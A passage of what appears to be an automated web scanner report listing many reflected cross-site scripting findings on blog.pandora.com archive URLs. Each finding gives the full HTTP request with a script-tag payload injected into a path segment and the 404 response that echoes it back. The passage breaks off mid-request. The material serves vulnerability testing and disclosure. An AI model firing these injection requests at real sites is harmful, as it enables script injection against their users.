Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:06:00 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 348


<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/2009/11e31a9<script>alert(1)</script>92fb96256a/ was not found on this server.</p>
...[SNIP]...

1.215. http://blog.pandora.com/pandora/archives/2009/12/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blog.pandora.com
Path:   /pandora/archives/2009/12/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 55536<script>alert(1)</script>68fbf40c4c1 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora55536<script>alert(1)</script>68fbf40c4c1/archives/2009/12/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:05:28 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349


<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora55536<script>alert(1)</script>68fbf40c4c1/archives/2009/12/ was not found on this server.</p>
...[SNIP]...

1.216. http://blog.pandora.com/pandora/archives/2009/12/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blog.pandora.com
Path:   /pandora/archives/2009/12/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 5c021<script>alert(1)</script>00e0120b037 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archives5c021<script>alert(1)</script>00e0120b037/2009/12/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:05:30 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349


<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives5c021<script>alert(1)</script>00e0120b037/2009/12/ was not found on this server.</p>
...[SNIP]...

1.217. http://blog.pandora.com/pandora/archives/2009/12/ [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blog.pandora.com
Path:   /pandora/archives/2009/12/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 7c9b0<script>alert(1)</script>b9522db024f was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archives/20097c9b0<script>alert(1)</script>b9522db024f/12/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:05:32 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349


<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/20097c9b0<script>alert(1)</script>b9522db024f/12/ was not found on this server.</p>
...[SNIP]...

1.218. http://blog.pandora.com/pandora/archives/2009/12/ [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blog.pandora.com
Path:   /pandora/archives/2009/12/

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 9e75b<script>alert(1)</script>e4d44414054 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archives/2009/129e75b<script>alert(1)</script>e4d44414054/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:05:35 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349


<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/2009/129e75b<script>alert(1)</script>e4d44414054/ was not found on this server.</p>
...[SNIP]...

1.219. http://blog.pandora.com/pandora/archives/2010/01/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blog.pandora.com
Path:   /pandora/archives/2010/01/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload cc983<script>alert(1)</script>2400c298808 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandoracc983<script>alert(1)</script>2400c298808/archives/2010/01/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:04:41 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349


<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandoracc983<script>alert(1)</script>2400c298808/archives/2010/01/ was not found on this server.</p>
...[SNIP]...

1.220. http://blog.pandora.com/pandora/archives/2010/01/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blog.pandora.com
Path:   /pandora/archives/2010/01/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 8de66<script>alert(1)</script>475006746a0 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archives8de66<script>alert(1)</script>475006746a0/2010/01/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:04:43 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349


<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives8de66<script>alert(1)</script>475006746a0/2010/01/ was not found on this server.</p>
...[SNIP]...

1.221. http://blog.pandora.com/pandora/archives/2010/01/ [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blog.pandora.com
Path:   /pandora/archives/2010/01/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 2e9cf<script>alert(1)</script>65e022c3582 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archives/20102e9cf<script>alert(1)</script>65e022c3582/01/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:04:45 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349


<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/20102e9cf<script>alert(1)</script>65e022c3582/01/ was not found on this server.</p>
...[SNIP]...

1.222. http://blog.pandora.com/pandora/archives/2010/01/ [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blog.pandora.com
Path:   /pandora/archives/2010/01/

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 61fb7<script>alert(1)</script>7b57931b113 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archives/2010/0161fb7<script>alert(1)</script>7b57931b113/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:04:48 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349


<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/2010/0161fb7<script>alert(1)</script>7b57931b113/ was not found on this server.</p>
...[SNIP]...

1.223. http://blog.pandora.com/pandora/archives/2010/02/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blog.pandora.com
Path:   /pandora/archives/2010/02/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload b45c8<script>alert(1)</script>6c1d1e3fb41 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandorab45c8<script>alert(1)</script>6c1d1e3fb41/archives/2010/02/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:04:41 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349


<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandorab45c8<script>alert(1)</script>6c1d1e3fb41/archives/2010/02/ was not found on this server.</p>
...[SNIP]...

1.224. http://blog.pandora.com/pandora/archives/2010/02/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blog.pandora.com
Path:   /pandora/archives/2010/02/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload c321c<script>alert(1)</script>4ec169aa6ab was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archivesc321c<script>alert(1)</script>4ec169aa6ab/2010/02/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:04:44 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349


<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archivesc321c<script>alert(1)</script>4ec169aa6ab/2010/02/ was not found on this server.</p>
...[SNIP]...

1.225. http://blog.pandora.com/pandora/archives/2010/02/ [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blog.pandora.com
Path:   /pandora/archives/2010/02/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload fa813<script>alert(1)</script>ceeadd94af1 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archives/2010fa813<script>alert(1)</script>ceeadd94af1/02/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:04:46 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349


<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/2010fa813<script>alert(1)</script>ceeadd94af1/02/ was not found on this server.</p>
...[SNIP]...

1.226. http://blog.pandora.com/pandora/archives/2010/02/ [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blog.pandora.com
Path:   /pandora/archives/2010/02/

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 57830<script>alert(1)</script>60d006b3a3f was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archives/2010/0257830<script>alert(1)</script>60d006b3a3f/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:04:50 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349


<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/2010/0257830<script>alert(1)</script>60d006b3a3f/ was not found on this server.</p>
...[SNIP]...

1.227. http://blog.pandora.com/pandora/archives/2010/03/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blog.pandora.com
Path:   /pandora/archives/2010/03/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 23646<script>alert(1)</script>c3ee8c2d938 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora23646<script>alert(1)</script>c3ee8c2d938/archives/2010/03/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:04:39 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349


<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora23646<script>alert(1)</script>c3ee8c2d938/archives/2010/03/ was not found on this server.</p>
...[SNIP]...

1.228. http://blog.pandora.com/pandora/archives/2010/03/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blog.pandora.com
Path:   /pandora/archives/2010/03/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 1b658<script>alert(1)</script>a757f005820 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archives1b658<script>alert(1)</script>a757f005820/2010/03/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:04:41 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349


<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives1b658<script>alert(1)</script>a757f005820/2010/03/ was not found on this server.</p>
...[SNIP]...

1.229. http://blog.pandora.com/pandora/archives/2010/03/ [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blog.pandora.com
Path:   /pandora/archives/2010/03/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 490a0<script>alert(1)</script>2b229393208 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archives/2010490a0<script>alert(1)</script>2b229393208/03/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:04:43 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349


<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/2010490a0<script>alert(1)</script>2b229393208/03/ was not found on this server.</p>
...[SNIP]...

1.230. http://blog.pandora.com/pandora/archives/2010/03/ [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blog.pandora.com
Path:   /pandora/archives/2010/03/

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 8018f<script>alert(1)</script>0037f1ec75a was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archives/2010/038018f<script>alert(1)</script>0037f1ec75a/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:04:46 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349


<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/2010/038018f<script>alert(1)</script>0037f1ec75a/ was not found on this server.</p>
...[SNIP]...

1.231. http://blog.pandora.com/pandora/archives/2010/04/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blog.pandora.com
Path:   /pandora/archives/2010/04/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload bb4ba<script>alert(1)</script>cf73c74ede8 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandorabb4ba<script>alert(1)</script>cf73c74ede8/archives/2010/04/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
